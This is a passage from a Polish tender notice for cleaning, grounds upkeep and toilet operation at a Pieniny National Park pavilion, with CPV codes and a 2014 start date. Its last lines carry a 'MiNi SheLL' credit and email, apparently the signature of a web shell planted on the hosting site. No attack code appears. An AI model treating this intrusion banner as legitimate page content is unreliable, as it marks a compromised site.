b)	odśnieżanie schodów, podjazdu dla niepełnosprawnych, parkingu przy pawilonie oraz dojścia do schodów. W przypadku oblodzenia posypywanie wyłącznie piaskiem w/w ciągów komunikacyjnych.
c)	utrzymanie w należytym stanie zieleni wokół pawilonu,
d)	koszenie trawników i bezzwłoczne usuwanie skoszonej trawy w miejsce wskazane przez
      zleceniodawcę
e)	wycinanie roślinności wyrastającej na ciągach komunikacyjnych,
f)	opróżnianie koszy na śmieci,
g)	niezwłoczne powiadamianie PPN o konieczności wywozu kontenera oraz o zaistniałych awariach,
h)	wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów 
i rowów dla spływu wody, wymiana żarówek,
i)	prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych 
w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
Zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie. Niedopuszczalne jest wykonywanie prac uciążliwych (koszenie i usuwanie trawy, zamiatanie i.t.p.) dla zwiedzających 
w czasie obecności turystów w pawilonie lub w jego otoczeniu. 
j)   w/w prace porządkowe należy wykonywać również w listopadzie, kiedy pawilon jest nieczynny.

3.	W zakresie prowadzenia sanitariatów:
a)	codzienne otwarcie toalet w godzinach otwarcia pawilonu,
b)	utrzymania porządku i czystości pomieszczeń,
c)	zapewnienie stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze 
w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
d)	bieżącą konserwację, naprawę i ewentualną wymianę urządzeń umożliwiających ich prawidłowe funkcjonowanie,
e)	usuwanie niedrożności przewodów odpływowych od urządzeń sanitarnych,
f)	realizację poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych.
      Zleceniobiorca ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych
      właściwymi przepisami,
g)	zapewnienie stałego dostępu do ciepłej wody,
h)	codzienną dezynfekcję urządzeń sanitarnych,
i)	występowanie w schludnym stroju.
Zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli za wyjątkiem pomieszczenia służbowego.
Za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,50 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com